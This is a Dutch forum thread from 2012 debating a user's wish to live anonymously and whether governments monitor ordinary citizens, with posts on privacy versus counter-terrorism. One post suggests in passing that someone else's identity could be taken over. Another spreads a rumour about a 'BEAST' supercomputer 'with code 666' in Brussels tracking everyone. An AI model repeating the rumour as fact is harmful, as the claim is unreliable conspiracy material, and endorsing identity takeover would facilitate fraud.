Ik denk toch echt dat, wanneer ik bij een inlichtingendienst werk, ik toch ook zeker mensen zoals TS globaal in de gaten zou willen houden. Op mij komt hij in ieder geval over als iemand die helemaal kan doorslaan en zo maar eens de volgende kan zijn die die met een Suzuki Apeldoorn doorrijdt als kamikazepiloot of Rambo denkt te zijn in een winkelcentrum. Brr...quote:Op woensdag 30 mei 2012 02:36 schreef SchoneZoon het volgende:
Volledig anoniem leven kan niet in Nederland, dan moet je maar in een of andere jungle in Afrika of Zuid-Amerika gaan wonen![]()
En waarom leg je jezelf zoveel beperkingen op om anoniem te blijven? Dat je bepaalde zaken geheim wil houden kan ik begrijpen, maar als je zover gaat dat je zelfs andere routes gaat lopen, dan ben je echt niet 100%. En geloof mij maar, je bent echt niet zo belangrijk dat iemand jouw gegevens gaat opzoeken om jouw leven te kunnen onderzoeken![]()
Je bent gewoon een nietszeggend persoon tussen al die miljarden mensen. Denk je nou echt dat de overheid/geheime dienst jou zal volgen?![]()
En als je iets van plan bent en je wordt gepakt, dan kunnen ze heus niet al jouw gegevens opvragen om je leven te onderzoeken.
(Misschien in de toekomst, als ze de technologie ervoor hebben, maar dat is een ander verhaal).
Wat heeft die nieuwe identiteit voor meerwaarde als deze wel gewoon 'gevolgd' kan worden?quote:Op donderdag 24 mei 2012 05:07 schreef Piet_Piraat het volgende:
Internet is er genoeg openbaar te vinden.
Wanneer je echt wilt kun je iemand anders zijn identiteit overnemen.
Het hoeft niet die geheime dienst of overheid te zijn - er is hi-tech apparatuur al in de handen van criminele groepjes dat vind het heel leuk om gewone mensen lastig te vallen of pesten.quote:Op woensdag 30 mei 2012 14:10 schreef Lavenderr het volgende:
[..]
Dat dus. Waarom zou het 'ze' boeien als je gewoon je leven leeft en gewoon je werk doet?
Ja, ik weet dat er pesters zijn, die heb je overal.quote:Op donderdag 31 mei 2012 15:18 schreef Tingo het volgende:
[..]
Het hoeft niet die geheime dienst of overheid te zijn - er is hi-tech apparatuur al in de handen van criminele groepjes dat vind het heel leuk om gewone mensen lastig te vallen of pesten.
1. Tuurlijk is die technologie daar.quote:Op woensdag 30 mei 2012 13:51 schreef SchoneZoon het volgende:
[..]
Wie zou dat dan doen? Waarschijnlijk mensen uit je omgeving of bedrijven waar je solliciteert. Maar dat blijft hooguit bij googlen.
Ik kan me niet voorstellen dat mensen of overheidsinstellingen gegevens van jouw AH-bonuskaart gaan opvragen, of van je OV-chipkaart, of camerabeelden gaan analyseren om te kijken welke route je loopt![]()
1. Ze hebben er nog niet de technologie voor om alle gegevens van miljoenen mensen op te slaan en te bewaren voor een langere tijd.
2. Voor zover ik weet is er geen wet die toestaat dat de overheid ALLE gegevens van jou mag opvragen.
Als je een of andere hoge maffiabaas bent kan ik het begrijpen. Maar volgens mij is TS gewoon een normale, doorsnee jongen waar niemand interesse in zou hebben
Fun- thats what bullies do.quote:Op donderdag 31 mei 2012 15:21 schreef Lavenderr het volgende:
[..]
Ja, ik weet dat er pesters zijn, die heb je overal.
Maar criminelen die gewone mensen lastigvallen puur om het pesten, wat zit daar voor hun in dan?
Met de Breiviks zijn de lone wolfs nu ook in Europa een target, en die moeten de inlichtendiensten toch uit de reguliere bevolking filteren. Ik denk dat we allemaal regelmatig door zo'n filter gaan. Dat kan best verantwoord worden juridisch gezien onder het mom van staatsveiligheid.quote:Op woensdag 30 mei 2012 02:36 schreef SchoneZoon het volgende:
iedere nederlander staat sowieso in heeeeul veul databases.quote:Op vrijdag 25 mei 2012 19:35 schreef Piet_Piraat het volgende:
[..]
Ik sta vast nog wel ergens in een database, ga je mijn naam googlen is er niets te vinden.
En dat is erg?quote:Op donderdag 31 mei 2012 16:38 schreef Gray het volgende:
[..]
Met de Breiviks zijn de lone wolfs nu ook in Europa een target, en die moeten de inlichtendiensten toch uit de reguliere bevolking filteren. Ik denk dat we allemaal regelmatig door zo'n filter gaan. Dat kan best verantwoord worden juridisch gezien onder het mom van staatsveiligheid.
Is een moeilijke afweging: privacy versus terrorismebestrijding.quote:
omg stalkerquote:Op donderdag 31 mei 2012 21:00 schreef monkyyy het volgende:
Koop onder een schuilnaam je eigen eilandje in de Caribbean, ga daar leven van vis en kokosnoten.
http://www.caribbeanislandbrokers.com/islands-for-sale
Are you fucking kidding me? Heb je dit boek wel eens gelezen? Ik heb absoluut geen zin in een Godwin, maar is je bekend hoe men heel snel wist wie er wel en niet joods was? Wil je (in de toekomst) be- , of erger nog, ver-oordeeld kunnen worden op een lichamelijke of geestelijke eigenschap die de heersende regering niet zint?quote:Op donderdag 31 mei 2012 05:06 schreef SemperFii het volgende:
Dus TS, maar ook anderen die zweren bij hun privacy, waar ga ik de fout in? Wat is er zo bezwarend aan een overheid die meer inzicht heeft over het leven van haar burgers?
Altijd na het dineren even met een kopje koffie rustig jouw posthistory doorlezen.quote:
Jij bent echt zo naief he. Ze zijn al je data aan het opslaan en verzamelen dat weer analyseren.quote:Op woensdag 30 mei 2012 02:36 schreef SchoneZoon het volgende:
Steve Quayle: BEAST supercomputer in Brussel klaar om ingezet te wordenquote:
dude je bent echt gestoordquote:Op donderdag 31 mei 2012 22:30 schreef zyntex het volgende:
[..]
Jij bent echt zo naief he. Ze zijn al je data aan het opslaan en verzamelen dat weer analyseren.
Computers en cameras enz. Worden steeds beter.
Alles bij elkaar gaat steeds meer geregeld worden door computers. Kunnen makkelijk over een tijdje miljarden met tegelijk volgen. Er gaan ook geruchten van een megacomputer met code 666 in brussel die gaat doen.
Wat een drievoudige vertaling al niet allemaal verwoest....quote:Op donderdag 31 mei 2012 22:41 schreef zyntex het volgende:
[..]
Steve Quayle: BEAST supercomputer in Brussel klaar om ingezet te worden
http://xandernieuws.punt.nl/?id=557333&r=1&tbl_archief=0&
Beveiliging is big business sinds 911.quote:Op woensdag 30 mei 2012 16:50 schreef SchoneZoon het volgende:
[..]
"Ze" hebben nieteens de tijd en geld om al die criminelen te volgen, laat staan dat ze een of andere nietszeggende burger gaan volgen![]()
The war on terror is overdrevend bangmakerij....'n sprookje zodat ze kunnen mensen controleren,in de gaat houden en dan zeggen dat ze doen het voor onze veiligheid.quote:Op donderdag 31 mei 2012 19:54 schreef Gray het volgende:
[..]
Is een moeilijke afweging: privacy versus terrorismebestrijding.
TS moet wel zijn id meenemen, je weet maar nooit of de toendracontroleurs langskomen om de woz-waarde van zijn hutje vast te stellenquote:Op vrijdag 1 juni 2012 14:19 schreef Erasmo het volgende:
TS je pakt het veels te moeilijk aan.
Ga gewoon naar een of andere toendra waar een normaal mens nog niet dood gevonden worden. Het enige wat je dan verder nog nodig hebt is een schop en een bijl om een plaggenhut te bouwen en een moestuin te onderhouden en je hebt geen last meer van de wereld en vice versa.
mams doe es nietquote:Op donderdag 31 mei 2012 22:02 schreef monkyyy het volgende:
[..]
Altijd na het dineren even met een kopje koffie rustig jouw posthistory doorlezen.
Krijgen mensen doordat big brother last heeft van spionage-waanzin.quote:Op donderdag 24 mei 2012 01:22 schreef Tropanzia het volgende:
Hoe heette dat ook al weer? Oja achtervolgingswaanzin.
|
Forum Opties | |
---|---|
Forumhop: | |
Hop naar: |